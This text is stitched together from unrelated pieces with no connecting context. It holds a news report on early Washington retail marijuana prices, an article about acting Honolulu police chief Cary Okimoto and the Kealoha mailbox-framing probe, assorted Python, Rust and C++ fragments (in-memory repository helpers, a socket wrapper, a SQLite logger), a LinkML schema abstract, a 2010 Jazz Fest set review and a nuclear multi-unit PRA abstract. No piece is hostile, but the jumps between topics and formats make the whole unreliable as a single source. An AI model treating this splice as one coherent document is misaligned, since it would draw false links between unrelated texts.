We’re in negotiations with several local Producer/Processors (P&Ps) for usable marijuana with varied product availability schedules ranging from July 9th through August 15th. … Our primary concern is long-term relationships with model-efficient pricing P&Ps who understand our market place and demographic target.” No ‘first’ store According to Liquor Control Board spokesman Mikhail Carpenter, five retail applicants were ready for final inspection as of Wednesday. Meaning, all of their paperwork checks out and all that’s left is the walkthrough inspection to make sure their store actually has all the security and other equipment they’re supposed to have. “I’ve had my final review and passed and now I just need to finish my (store) front, get fingerprinted, and pass my inspection, which is supposed to happen in about a week,” said Austin Lott of the Fresh Greens retail hopeful in Winthrop. “I’ll be opening, probably, on the third of July … (if all goes well). I don’t have much info on prices — it’s all just speculation at this point. But I expect them to be higher than black market, certainly. They’ll come way down next year come November/December when the big outdoor crops come in.” The liquor board still plans to release the first licenses in a batch in early July (no day set), Carpenter said. Thus, despite some news reports that this or that store will be the “first,” no one store will be the first licensed, though perhaps a store could be the first to open doors after getting a license. Another retailer who expects to be opening in July in Millwood — “Sativa Sisters,” run by Cathy Smith et al — reports: “I have only one producer who has been brave enough to throw out a number. One gram for $6.30. Not a bad price but until testing who knows. Another producer/processor is telling me between $150 and $200 per oz (to the retailer). $150 works great but $200 means the black market might win. I am tying up any production I can, but so few have anything to sell. 
I currently hope to have 40 pounds to open. The quality is yet to be determined. Gram bags might be in the $20 range (for customers), ounce for top shelf could be about $600 … Most will be $350+.”

What the growers are saying

It’s one thing to hear from retailers, who clearly have an interest in seeing the lowest prices they can get coming in the door, but what are the growers saying? “There will be a ton of froth in the water during the first three months,” said Brian Stroh, grower/owner at CannaMan Farms. “Folks will be squeezing each other and not making many friends. I’ve been contacted by producers, processors and retailers, all with their own game on squeezing the market. “I’ve done my math and will produce 1/8th bags only at a price of $4,000/lb to the retailer. At this price point both the retailer and I make roughly (retailer slightly more) the same dollar amount on the transactional cost of $75 per eighth to the customer after sales tax.” That’s roughly $21 a gram to the consumer. Stroh said he’ll have around 10 pounds for sale to retailers the first week of July “and we intend to sprinkle it around the state for the opener. We will be in full production swing by late July with another 40 pounds.” Another grower said he’ll have 20 pounds of indoor product available every two weeks starting July 28. “We will have outdoor product available in October. Depends on Mother Nature but a good guess is 750 lbs. Our price out the door is 7.50 a gram.” That’s around $3,400 a pound to retailers. “I have been approached with the idea of contracts at a pre-set price of $7 per gram, when the retailer plans to be at $20 per gram,” another grower told us. “I am hoping that nobody is fool enough to sign these contracts, and we all let the market speak.” This grower said he expects prices to range from $3,000 to $4,000 per pound to the retailer with prices “leveling off” in the $18 to $22 per gram range to consumers. But some think the prices will be higher.
“In terms of pricing for the first wave,” said Soos of Verdavanti, a grower, “I would say $25 to $35 a gram on the retail side … I definitely think it’s feasible. They might say, ‘Oh we’ll sell it for less,’ but they’re going to be in a position to sell it. Even if they were going to say $50 a gram, somebody will buy it.”

Ring in the outdoor grows

The general expectation is that once September rolls around, outdoor-grown marijuana will start to hit the market and prices will stabilize. One outdoor grower we talked with hopes to have 600 pounds ready by Thanksgiving. This grower also wished to remain anonymous since there’s so much wheeling and dealing going on and no one wants to get locked into anything just yet. “Unlike medical,” the outdoor grower said, “the retailer cannot package for the purchaser. Purchasers cannot buy more than an ounce. If a retailer only wants 1 gram packages (454 grams per pound) the price per pound could triple vs. providing oz. size packages. At ounce packages, the wholesale price will be $1,600 to $2,000 per lb.” With outdoor at those prices (outdoor tends to be less expensive than indoor, just based on the production costs), buds should in a year average between $2,200 and $2,800 a pound to the retailers, who then have expenses and taxes to tack on. So in a year or so, according to general consensus, bud should pencil out to about $15 to $20 a gram to consumers, with “premier” or “connoisseur” grade cannabis hitting $25 a gram and higher. Average for medical marijuana is currently between $10 a gram and $15 for premium. Colorado’s recreational prices are running around $15 to $25 a gram. Jake Ellison can be reached at 206-448-8334 or [email protected]. Follow Jake on Twitter at twitter.com/Jake_News. Also, swing by and *LIKE* his page on Facebook. If Google Plus is your thing, check out our marijuana coverage here.
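The per-pound and per-gram figures quoted throughout can be cross-checked with a quick conversion, sketched here for illustration (453.6 grams per pound; the function names are our own, not anything from the story):

```python
GRAMS_PER_POUND = 453.6

def per_gram(price_per_pound: float) -> float:
    """Wholesale price per gram given a per-pound price."""
    return price_per_pound / GRAMS_PER_POUND

def per_pound(price_per_gram: float) -> float:
    """Per-pound equivalent of a per-gram price."""
    return price_per_gram * GRAMS_PER_POUND

# The grower quoting $7.50 a gram out the door is asking roughly $3,400 a pound,
# and CannaMan Farms' $4,000/lb works out to about $8.82 a gram wholesale.
```

This is why the article can treat "$3,000 to $4,000 per pound to the retailer" and "$7 to $9 per gram wholesale" as the same conversation.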
Acting Honolulu Police Chief Cary Okimoto may face uncomfortable questions come January as he attempts to explain to police commissioners his proximity to a growing scandal involving a missing mailbox. On Tuesday, Okimoto took over the nation’s 20th-largest police department after his boss, Chief Louis Kealoha, voluntarily went on paid leave as a federal grand jury continues to investigate him and his wife regarding allegations of corruption and abuse of power. The Honolulu Police Commission, which has the authority to fire the chief, meets Jan. 4. Okimoto is closely tied to some of the allegations that have already resulted in one former police officer pleading guilty to a felony conspiracy charge. Cory Lum/Civil Beat The Kealohas have been accused of framing Gerard Puana, the estranged uncle of the chief’s wife, Katherine, for the theft of their mailbox in 2013. Katherine Kealoha is a city prosecutor and a supervisor in the career criminal division. She and Puana have been locked in a bitter family dispute over money for several years. Last week, retired HPD Officer Niall Silva, who worked in the department’s clandestine Criminal Intelligence Unit, admitted in federal court that he and five unnamed co-conspirators — four of them fellow cops — worked alongside “Co-conspirator No. 1,” who police records show is Katherine Kealoha, to frame Puana for the mailbox theft. “There are two issues: One is whether criminal activity actually occurred at the Honolulu Police Department, and two is whether the public will be comfortable with an interim chief who appears to have been in Chief Kealoha’s inner circle.” — Police Commissioner Loretta Sheehan In 2013, Okimoto was the major in charge of the patrol district that oversaw the elite unit of police officers who investigated and arrested Puana. He’s also been called to testify before the federal grand jury that’s been empaneled by the U.S.
Justice Department as part of its criminal investigation into the Kealohas and other members of Honolulu’s law enforcement community. Puana’s criminal defense attorney, Alexander Silvert, said this week that Okimoto’s ties to the mailbox case should worry the Police Commission, especially as its members — most of whom have been full-throated supporters of Kealoha — grapple with how to repair the department’s reputation. “It’s none of my business who is appointed chief of police by the Police Commission,” said Silvert, a federal public defender. “However, I find it disturbing that an individual who may have some role in some way with this case could be considered for that position without a serious investigation into his conduct and involvement.”

‘Questions Have To Be Asked’

Okimoto was a major in command of HPD District 6, which covers Waikiki, from February 2013 to August 2014. Silvert said the crime reduction unit from that district was heavily involved in the investigation, secret surveillance and arrest of Puana for the mailbox theft, despite the fact that the alleged crime occurred in Kahala, part of HPD District 7. Puana was also arrested outside District 6. He was taken into custody June 29, 2013, in a church parking lot on Kaheka Street, which is in District 1. Each patrol district on Oahu has a crime reduction unit, or CRU as it’s commonly known. Each CRU (pronounced “crew”) has about 10 officers, mostly plainclothes, who target street crimes, such as robbery, burglary and patterned car break-ins. But the units can also conduct surveillance or assist in high-profile crimes. In the mailbox case, police records show there were at least eight officers involved in the investigation and arrest of Puana, including Dru Akagi, a homicide detective in HPD’s Criminal Investigation Division who had been assigned by Lt. Walter Calistro.
Silvert also noted that the two sergeants in charge of the Waikiki CRU that arrested Puana — Michael Cusumano and John Haina — were both on the board of directors of the State of Hawaii Organization of Police Officers, the statewide police union that had backed Kealoha’s bid for chief in 2009. Cusumano and Haina were also known within the department as the chief’s surfing buddies. They were both named as sergeants of the year in 2014. Given the scope of the federal investigation and the allegations that have come out so far — that several officers worked in concert to put an innocent man in jail to help settle a personal score for their boss and his wife — Silvert said the Police Commission needs to start taking its responsibilities more seriously. Silvert has criticized the commission in the past for being weak and ineffective in its handling of the mailbox case. He said it should not follow the same tack with Okimoto, who he believes deserves a thorough vetting, especially if he’s going to be in charge of HPD. Silvert said that Okimoto’s proximity to his client’s arrest needs to be explored by the commission, an independent oversight agency. “From what I think, questions have to be asked about what he knew, when he knew it and, if he didn’t know it, why he didn’t,” Silvert said. “They are responsible questions. They are pertinent questions. They need to be answered, and the commission needs to be satisfied with the answers. More importantly, the commission needs to look at documents to (validate) those answers. I’m tired of the commission simply talking to people and taking their word. That’s not what a thorough investigation implies.” Silvert added that during his own investigation of the mailbox theft — the evidence of which he ultimately turned over to the FBI — he did not find any information that directly implicated Okimoto in any wrongdoing. How Close Was Okimoto To Kealoha? 
Okimoto declined a Civil Beat interview request to discuss his involvement in the mailbox case. During a press conference Tuesday to announce Kealoha’s leave, Okimoto acknowledged that he was the major in Waikiki who oversaw the CRU unit that ultimately arrested Puana. Asked if he was aware that his unit, which he was ultimately in charge of, had in fact arrested Puana, Okimoto said he was “not sure.” Okimoto added that he did not have any discussions with the chief about the allegations involving the mailbox theft or the alleged framing of Puana that Silva pleaded guilty to last week. “The key point here is that he did not get a target letter.” — Police Commission Chairman Max Sword, referring to Okimoto Okimoto refused to discuss any of his testimony before the grand jury and told the media that he had not been served with a Justice Department target letter, similar to the one Kealoha and other officers received, indicating they are suspected of committing crimes. Should he receive a target letter, Okimoto said, “I would have to step down.” Okimoto has 32 years of experience with HPD. He was promoted to deputy chief Oct. 1, 2015 to replace Dave Kajihiro, who retired after 30 years with the department. As deputy chief, Okimoto was assigned to oversee the HPD’s administrative operations, which include training, finance, communications and the professional standards office, formerly known as the internal affairs division. When Okimoto became deputy chief, it was his second promotion of the year. In April 2015, Okimoto was promoted from major to assistant chief. Police Commission Chairman Max Sword did not respond to a Civil Beat request for comment about Okimoto. But at Tuesday’s press conference, he said Okimoto’s connection to the ongoing investigation, at least as a grand jury witness, does not preclude him from running the department. “The key point here is that he did not get a target letter,” Sword said.
Honolulu Managing Director Roy Amemiya, who was serving as acting mayor for vacationing Kirk Caldwell, said that the administration has “full confidence” in Okimoto to run the department while the Police Commission determines what comes next. But Police Commissioner Loretta Sheehan said she has a number of concerns about Okimoto’s appointment, some of which echo Silvert’s own worries about the acting chief. Sheehan made clear, as she’s required to under Police Commission rules, that her views don’t represent those of her colleagues or the agency as a whole. Sheehan said commissioners should be “very cautious” given Okimoto’s close relationship to the chief, especially considering the fact that Kealoha had twice promoted Okimoto within the department. She also wants him to explain what involvement, if any, he had in the Puana case. “The alleged crime happened in District 7, the arrest occurred eight days later in District 1, so I’d like to know why District 6 officers were involved in the surveillance and arrest of Mr. Puana and what Cary Okimoto knows about that,” Sheehan said. “There are two issues: One is whether criminal activity actually occurred at the Honolulu Police Department, and two is whether the public will be comfortable with an interim chief who appears to have been in Chief Kealoha’s inner circle.” Whether Okimoto will answer these questions in a public forum remains to be seen. Police commissioners tend to hold most of their discussions behind closed doors in executive session. There’s no indication so far that the Jan. 4 meeting will be any different. In addition to the chief, at least four other police officers have received target letters from the Department of Justice. The department, which has a history of shielding the identity of officers accused of wrongdoing, has refused to identify them. 
“There are sensitive matters that should be discussed in executive session, and I think they are frequently intermingled with topics that should be discussed in open session,” Sheehan said. “I think it’s going to be difficult to navigate having that conversation when parts of it should be public and parts of it should be private.”
num = input()
num = list(map(int, num.split()))
lst = []
for i in range(num[0]):
    button = input()
    button = list(map(int, button.split()))
    button.remove(button[0])
    for elem in button:
        if elem not in lst:
            lst.append(elem)
lst.sort()
if lst == list(range(1, num[1] + 1)):
    print("YES")
else:
    print("NO")
use crate::repos::shared::repo::DeleteResult;
use nettu_scheduler_domain::{Entity, Meta, ID};
use std::sync::Mutex;

use super::query_structs::MetadataFindQuery;

/// Useful functions for creating inmemory repositories
pub fn insert<T: Clone>(val: &T, collection: &Mutex<Vec<T>>) {
    let mut collection = collection.lock().unwrap();
    collection.push(val.clone());
}

pub fn save<T: Clone + Entity + std::fmt::Debug>(val: &T, collection: &Mutex<Vec<T>>) {
    let mut collection = collection.lock().unwrap();
    for i in 0..collection.len() {
        if collection[i].id() == val.id() {
            collection.splice(i..i + 1, vec![val.clone()]);
        }
    }
}

pub fn find<T: Clone + Entity>(val_id: &ID, collection: &Mutex<Vec<T>>) -> Option<T> {
    let collection = collection.lock().unwrap();
    for i in 0..collection.len() {
        if collection[i].id() == val_id {
            return Some(collection[i].clone());
        }
    }
    None
}

pub fn find_by<T: Clone + Entity, F: FnMut(&T) -> bool>(
    collection: &Mutex<Vec<T>>,
    mut compare: F,
) -> Vec<T> {
    let collection = collection.lock().unwrap();
    let mut items = vec![];
    for item in collection.iter() {
        if compare(item) {
            items.push(item.clone());
        }
    }
    items
}

pub fn delete<T: Clone + Entity>(val_id: &ID, collection: &Mutex<Vec<T>>) -> Option<T> {
    let mut collection = collection.lock().unwrap();
    for i in 0..collection.len() {
        if collection[i].id() == val_id {
            let deleted_val = collection.remove(i);
            return Some(deleted_val);
        }
    }
    None
}

pub fn delete_by<T: Clone + Entity, F: Fn(&T) -> bool>(
    collection: &Mutex<Vec<T>>,
    compare: F,
) -> DeleteResult {
    DeleteResult {
        deleted_count: find_and_delete_by(collection, compare).len() as i64,
    }
}

pub fn find_and_delete_by<T: Clone + Entity, F: Fn(&T) -> bool>(
    collection: &Mutex<Vec<T>>,
    compare: F,
) -> Vec<T> {
    let mut collection = collection.lock().unwrap();
    let mut deleted_items = vec![];
    for i in (0..collection.len()).rev() {
        let index = collection.len() - i - 1;
        if compare(&collection[index]) {
            let deleted_item = collection.remove(index);
            deleted_items.push(deleted_item);
        }
    }
    deleted_items
}

pub fn update_many<T: Clone + Entity, F: Fn(&T) -> bool, U: Fn(&mut T)>(
    collection: &Mutex<Vec<T>>,
    compare: F,
    update: U,
) {
    let mut collection = collection.lock().unwrap();
    for i in 0..collection.len() {
        let index = collection.len() - i - 1;
        if compare(&collection[index]) {
            update(&mut collection[index]);
        }
    }
}

/// Ignores skip and limit as this is just used for testing
pub fn find_by_metadata<T: Clone + Entity + Meta>(
    collection: &Mutex<Vec<T>>,
    query: MetadataFindQuery,
) -> Vec<T> {
    let skip = query.skip;
    let mut skipped = 0;
    let limit = query.limit;
    let mut count = 0;
    find_by(collection, |e| {
        match e.metadata().get(&query.metadata.key) {
            Some(value) if *value == query.metadata.value && *e.account_id() == query.account_id => {
                if skip > skipped {
                    skipped += 1;
                    false
                } else if count == limit {
                    false
                } else {
                    count += 1;
                    true
                }
            }
            _ => false,
        }
    })
}
def clear_notification(
    loop: Union[urwid.MainLoop, urwid.main_loop.EventLoop], data: Any
) -> None:
    widgets.notifications.contents.pop()
    loop.remove_alarm(_alarms.get())
def update(self, update_values: Dict[str, List[float]]) -> None:
    for metric_name, metric_values in update_values.items():
        getattr(self, metric_name).update(metric_values)
Bringing Schemas to the Schemaless Ad-hoc spreadsheets can be appealing for managing some kinds of scientific data, but they allow bad practices like inconsistent types (e.g., string, integer, decimal) within individual columns, as well as open-ended categorical values (e.g., cell shapes). We have developed tools that infer LinkML schemas from spreadsheets, asserting types and enumerated lists that can be used to validate the dataset as it grows. Our tools can also associate OBO Foundry term identifiers with an enumeration’s permissible values in the spirit of interoperability.
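The kind of inference described above can be sketched in a few lines: scan each column, assert the narrowest type that fits every cell, and treat low-cardinality string columns as candidate enumerations. This is an illustrative sketch only, not the actual LinkML tooling; the function name and the cardinality threshold are invented for the example:

```python
def infer_column_schema(rows, enum_max_values=10):
    """Infer a {column: {"type": ..., "enum": [...]}} sketch from a list of row dicts."""
    schema = {}
    for col in rows[0].keys():
        values = [row[col] for row in rows]
        # Narrowest type that fits every cell in the column.
        if all(isinstance(v, int) for v in values):
            col_type = "integer"
        elif all(isinstance(v, (int, float)) for v in values):
            col_type = "decimal"
        else:
            col_type = "string"
        entry = {"type": col_type}
        # Low-cardinality string columns become candidate enumerations,
        # whose permissible values a curator could later map to OBO terms.
        distinct = sorted({str(v) for v in values})
        if col_type == "string" and len(distinct) <= enum_max_values:
            entry["enum"] = distinct
        schema[col] = entry
    return schema
```

Run against a toy spreadsheet such as `[{"cell_shape": "round", "count": 3}, ...]`, this yields an `integer` assertion for `count` and an enumeration (`round`, `spindle`, ...) for `cell_shape`, which is exactly the kind of constraint that catches mixed types and open-ended categories as the dataset grows.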
Voice of the Wetlands All-Stars
04/25/2010 Nola Jazzfest, New Orleans, LA
Set: Bayou Breeze, Louisiana Sunshine, Lonely Lonely Nights, Ya-Ya, Poor Man’s Paradise, The Things that I Used To Do, Band Intros, Me Donkey Want Water, Make A Good Gumbo

Bluesman Tab Benoit founded this Louisiana super-group in 2004 to raise awareness of the disappearing Louisiana coastline. This set was recorded 5 days after the Deepwater Horizon blew up, before anyone knew exactly how bad that event would really be.

Voice of the Wetlands All-Stars
Tab Benoit – guitar & vocals
Cyril Neville – percussion & vocals
Dr. John – keys and vocals
Anders Osborne – guitar & vocals
George Porter Jr. – bass & vocals
Johnny Vidacovich – drums
Johnny Sansone – harmonica, accordion, & vocals
Special Guests:
Big Chief Monk Boudreaux – vocals
Stanton Moore – drums
Allen Toussaint – piano

For more on Benoit’s Voice of the Wetlands foundation and how you can contribute to relief efforts in the Gulf of Mexico, click here: http://www.voiceofthewetlands.org/ Take the jump for pictures from the show and read a review from www.nola.com.

Voice of the Wetlands rings out loud at New Orleans Jazz Fest

The first two songs performed by the Voice of the Wetlands All-Stars today could have doubled as a recap of the weather report from Jazz Fest’s first weekend. To open, Tab Benoit and Cyril Neville traded verses on “Bayou Breeze,” whose chorus goes, “don’t let the water wash us away;” then, Neville took the lead on “Louisiana Sunshine.” The crowd was large and the mood was as sunny as the weather – the knee-deep moat that had surrounded the Acura Stage Friday and Saturday had even dried up enough for fans to stretch out in the grass where it had been. The VOW All-Stars are a supergroup, to put it mildly, and for most of the set, the band switched up who took the lead to give each star his chance to shine. Dr.
John recalled Earl King’s “Lonely Lonely Nights” (which he’s recorded himself) on “Weary Silent Night.” Anders Osborne, looking a bit like Billy Gibbons there with his caveman beard and rocker shades, wailed on guitar. The full effect of what can be done when talents that sizable work together started to reveal itself when Jumpin’ Johnny Sansone put down his harmonica and picked up an accordion for his own “Poor Man’s Paradise,” given Latin flavor with a cha-cha beat from Johnny Vidacovich and steel drums and cowbell from Neville. Galactic drummer Stanton Moore then relieved Vidacovich, hitting the stage with Big Chief Monk Boudreaux (Moore backed Boudreaux with Indian rhythms before, on Galactic’s 2007 release “From The Corner To The Block.”) Then Cyril Neville stepped out from behind his percussion rig to wail, Guitar Slim-style, on a plaintive, no-holds-barred blues with almost as much muscle as “The Things that I Used To Do.” All of the All-Stars’ songs are Louisiana topical, natch, but nothing preceding it got as much of a whoop from the crowd as “When I go to New Orleans/ I go straight to the 6th Ward… to Ernie K-Doe’s Mother-In-Law Lounge.” All bets were off when Allen Toussaint, in a crisp cream suit, took the stage for the finale, the zydeco-flavored rocker “Make A Good Gumbo.” After what looked like a brief chat with Dr. John (maybe, “Do you want the organ or the baby grand?”) Toussaint ripped into a wild boogie-woogie. Benoit, who’d played support up until then, stepped to the mic to lead the formidable crew. Everywhere you looked on the packed stage, a major Louisiana star was shredding – and wearing a face-splitting grin.
Posted in General Information, Music to Purchase, Download, or Stream, Show Reviews
Tags: Allen Toussaint, Anders Osborne, Big Chief Monk Boudreaux, Cyril Neville, Deepwater Horizon, Dr. John, George Porter Jr.,
Johnny Vidacovich, Gulf of Mexico, JazzFest, Johnny Sansone, Louisiana, New Orleans, oil spill, Stanton Moore, Tab Benoit, Voice of the Wetland's All-Stars
# terrascript/resource/oktadeveloper/oktaasa.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:27 UTC)
import terrascript


class oktaasa_assign_group(terrascript.Resource):
    pass


class oktaasa_create_group(terrascript.Resource):
    pass


class oktaasa_enrollment_token(terrascript.Resource):
    pass


class oktaasa_project(terrascript.Resource):
    pass


__all__ = [
    "oktaasa_assign_group",
    "oktaasa_create_group",
    "oktaasa_enrollment_token",
    "oktaasa_project",
]
#include "SocketHandler.h"

// Create a UDP socket bound to the given port.
Socket SocketHandler::CreateUDPSocket(unsigned short portno)
{
    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);

    // SO_REUSEADDR must be set *before* bind() to have any effect on the bind.
    int optval = 1;
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (const void *)&optval, sizeof(int));

    struct sockaddr_in serveraddr;
    bzero((char *)&serveraddr, sizeof(serveraddr));
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_addr.s_addr = htonl(INADDR_ANY);
    serveraddr.sin_port = htons(portno);

    if (bind(sockfd, (struct sockaddr *)&serveraddr, sizeof(serveraddr)) < 0) {
        printf("SocketHandler::CreateUDPSocket:\tERROR on binding to port %i\n", portno);
    }
    return sockfd;
}

// Create an unbound UDP socket (the OS picks a port on first send).
Socket SocketHandler::CreateUDPSocketNOPORT()
{
    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    int optval = 1;
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (const void *)&optval, sizeof(int));
    return sockfd;
}

Socket SocketHandler::CreateTCPSocketCLIENT()
{
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    int optval = 1;
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (const void *)&optval, sizeof(int));
    return sockfd;
}

// Create a TCP socket bound to the given port and listening for clients.
Socket SocketHandler::CreateTCPSocketSERVER(unsigned short portno)
{
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);

    // Set before bind() so a recently closed server port can be reused.
    int optval = 1;
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (const void *)&optval, sizeof(int));

    struct sockaddr_in server;
    bzero((char *)&server, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(portno);

    if (bind(sockfd, (struct sockaddr *)&server, sizeof(server)) < 0) {
        printf("SocketHandler::CreateTCPSocketSERVER:\tERROR on binding to port %i\n", portno);
    }
    listen(sockfd, 5);
    return sockfd;
}

// Resolve hostname:portno into *serveraddr; returns 0 on success, h_errno on failure.
int SocketHandler::FilloutSocketAddress(SocketAddress* serveraddr, char* hostname, short portno)
{
    struct hostent *server = gethostbyname(hostname);
    if (server == NULL) {
        printf("SocketHandler::FilloutSocketAddress: Couldn't get host address of \"%s\"\n", hostname);
        switch (h_errno) {
            case HOST_NOT_FOUND:
                printf("\tHOST_NOT_FOUND (The specified host is unknown.)\n");
                break;
            case NO_ADDRESS:
                printf("\tNO_ADDRESS or NO_DATA (The requested name is valid but does not have an IP address.)\n");
                break;
            case NO_RECOVERY:
                printf("\tNO_RECOVERY (A nonrecoverable name server error occurred.)\n");
                break;
            case TRY_AGAIN:
                printf("\tTRY_AGAIN (A temporary error occurred on an authoritative name server. Try again later.)\n");
                break;
        }
        return h_errno;
    }
    bzero((char *) serveraddr, sizeof(sockaddr_in));
    serveraddr->sin_family = AF_INET;
    bcopy((char *)server->h_addr, (char *)&(serveraddr->sin_addr.s_addr), server->h_length);
    serveraddr->sin_port = htons(portno);
    return 0;
}

int SocketHandler::TCPConnectToServer(Socket sockfd, SocketAddress* where)
{
    int returned = connect(sockfd, (const sockaddr*) where, sizeof(SocketAddress));
    if (returned == -1) {
        printf("SocketHandler::TCPConnectToServer:\t%s\n", strerror(errno));
    }
    return returned;
}

// Block until a client connects; returns the accepted socket.
Socket SocketHandler::TCPWaitForClient(Socket sockfd, SocketAddress* where)
{
    int sizeofstruct = sizeof(SocketAddress);
    return accept(sockfd, (sockaddr*) where, (socklen_t*) &sizeofstruct);
}

int SocketHandler::TCPSend(Socket sockfd, void* data, int length)
{
    int returned = send(sockfd, data, length, 0);
    return returned;
}

int SocketHandler::UDPSend(Socket sockfd, void* data, int length, SocketAddress* where)
{
    int returned = sendto(sockfd, data, length, 0, (const sockaddr*)(where), sizeof(sockaddr));
    return returned;
}

int SocketHandler::Recv(Socket sockfd, void* where, int length)
{
    int size = recv(sockfd, where, length, 0);
    return size;
}

// Set the receive timeout; 0/0 means block indefinitely.
int SocketHandler::SetTimeout(Socket sockfd, int microseconds, int seconds)
{
    struct timeval time;
    time.tv_sec = seconds;
    time.tv_usec = microseconds;
    return setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &time, sizeof(time));
}

int SocketHandler::RecvFromWho(Socket sockfd, void* where, int length, SocketAddress* who)
{
    unsigned int wholength = sizeof(sockaddr_in);
    return recvfrom(sockfd, where, length, 0, (sockaddr*) who, &wholength);
}

// Read without consuming the data from the socket buffer.
int SocketHandler::PeekRecv(Socket sockfd, void* where, int length)
{
    return recv(sockfd, where, length, MSG_PEEK);
}

#define PingSpeed 100 * 1000 /* Microseconds */

// Fire pings (the marker byte 42) at `where` until one is echoed back.
void SocketHandler::SendPingsToWhere(Socket sockfd, SocketAddress* where)
{
    char c = 42;
    SetTimeout(sockfd, 1); // presumably the header declares a default `seconds = 0`
    while (true) {
        UDPSend(sockfd, &c, sizeof(c), where);
        int status = Recv(sockfd, &c, sizeof(c));
        if (status > 0)
            return;
        //usleep(PingSpeed);
    }
}

// Block until a ping arrives, remember who sent it, and echo it back.
void SocketHandler::WaitForPingsFromWho(Socket sockfd, SocketAddress* sa)
{
    SetTimeout(sockfd, 0); // presumably the header declares a default `seconds = 0`
    char c;
    int status = -1;
    while (status < 0) {
        status = RecvFromWho(sockfd, &c, sizeof(c), sa);
    }
    UDPSend(sockfd, &c, sizeof(c), sa);
}

void SocketHandler::CloseSocket(Socket s)
{
    shutdown(s, SHUT_RDWR);
    close(s);
}
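The ping handshake implemented by `SendPingsToWhere` / `WaitForPingsFromWho` above can be sketched in Python. This is a minimal single-process illustration using two loopback sockets, not the actual implementation; the C++ pinger retries in a loop, but loopback delivery is reliable enough that one shot suffices here.

```python
import socket

# Two UDP sockets on the loopback interface stand in for the two peers.
waiter = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
waiter.bind(("127.0.0.1", 0))                 # the WaitForPingsFromWho side
pinger = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pinger.settimeout(1.0)                        # stands in for SetTimeout()

# SendPingsToWhere: fire the marker byte 42 at the peer...
pinger.sendto(bytes([42]), waiter.getsockname())

# WaitForPingsFromWho: block until a ping arrives, then echo it back
# to whoever sent it.
data, who = waiter.recvfrom(1)
waiter.sendto(data, who)

# ...and the pinger stops as soon as the echo comes back.
echo, _ = pinger.recvfrom(1)
print(echo[0])  # 42

waiter.close()
pinger.close()
```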
def log_timeout(self, log_topics):
    # Record, for each timed-out topic, the last time it was seen.
    values = []
    for topic in log_topics:
        values.append((self.get_topic_name(topic), self.last_seen.get(topic)))
    c = self.connection.cursor()
    c.executemany(
        "INSERT INTO topic_log (topic, last_seen_before_timeout) "
        "VALUES (?, ?)",
        values)
    c.close()
    self.connection.commit()
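The `executemany` pattern above can be exercised against an in-memory SQLite database. The `topic_log` schema and the sample topic names below are guesses inferred from the column names in the INSERT, not part of the original code:

```python
import sqlite3

# Hypothetical schema inferred from the INSERT statement above.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE topic_log (topic TEXT, last_seen_before_timeout REAL)")

# One (topic, last_seen) pair per timed-out topic, as built in log_timeout().
values = [("sensor/temp", 1700000000.0), ("sensor/hum", 1700000123.5)]
conn.executemany(
    "INSERT INTO topic_log (topic, last_seen_before_timeout) VALUES (?, ?)",
    values)
conn.commit()

rows = conn.execute(
    "SELECT topic, last_seen_before_timeout FROM topic_log").fetchall()
print(rows)  # both pairs round-trip unchanged
```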
Incorporation of the Radioactive Interinfluence in Multi-Unit Seismic PRA

TEPCO's Kashiwazaki-Kariwa nuclear power station, with seven units, is the largest nuclear power station in the world. As the March 2011 accident at Fukushima Daiichi, which involved concurrent core damage at multiple units, demonstrated, the risk arising from earthquake and tsunami hazards is relatively significant in Japan, and these events are likely to damage multiple units simultaneously. It is therefore very important to understand the risk specific to multi-unit sites. Although multi-unit PRA involves several unique accident scenarios, this paper focuses on the influence of radioactive materials released outside the containment vessel on accident management at the adjacent unit. Events involving core damage or loss of containment function are considered as causes of the release of radioactive substances, and operator actions and the like are considered as the activities adversely affected by them. Incorporating this interaction into PRA is necessary to confirm its effect on risk. Accurately capturing the consequences of the time series of various events and their complicated interactions in a PRA model is very difficult, both because of the immaturity of the evaluation methods and because of the computational load. Therefore, as a first step in evaluating the risk that radioactive material releases pose to accident management, several simplifications are made according to the purpose. For example, Kashiwazaki-Kariwa units 6 and 7 were selected as the target units to simplify the model, and an earthquake is assumed as the initiating event because it is a strong common-cause factor across units. Whether operators can act at the adjacent plant is set conservatively based on a deterministic evaluation. A PRA that accounts for the radiation influence of a multi-unit accident is then compared with a conventional PRA. Several kinds of Core Damage Frequency (CDF) are quantified: CDF1 (the frequency of core damage at exactly one of the two units), CDF2 (the frequency of core damage at both units), and CDFTOTAL (the frequency of core damage at one or more units: CDF1 + CDF2), and the magnitude of this issue is provided. Although the change in CDFTOTAL was insignificant, CDF2 increased approximately 1.5-fold, showing the need for further study of the amount and timing of the radioactive substances released.
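The bookkeeping among the three frequencies can be sketched as follows. The numerical values are purely illustrative placeholders chosen for the sketch, not results from the paper; only the relation CDFTOTAL = CDF1 + CDF2 and the qualitative 1.5-fold change in CDF2 come from the text above.

```python
# Illustrative placeholder frequencies (per reactor-year); NOT the paper's results.
cdf1 = 2.0e-6   # core damage at exactly one of the two units
cdf2 = 4.0e-7   # core damage at both units

cdf_total = cdf1 + cdf2  # core damage at one or more units

# A 1.5-fold increase in CDF2 (the paper's qualitative finding) barely moves
# the total when CDF2 is a small share of it.
cdf2_with_interinfluence = 1.5 * cdf2
cdf_total_new = cdf1 + cdf2_with_interinfluence

relative_change = cdf_total_new / cdf_total - 1.0
print(f"{relative_change:.1%}")  # 8.3%
```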
About

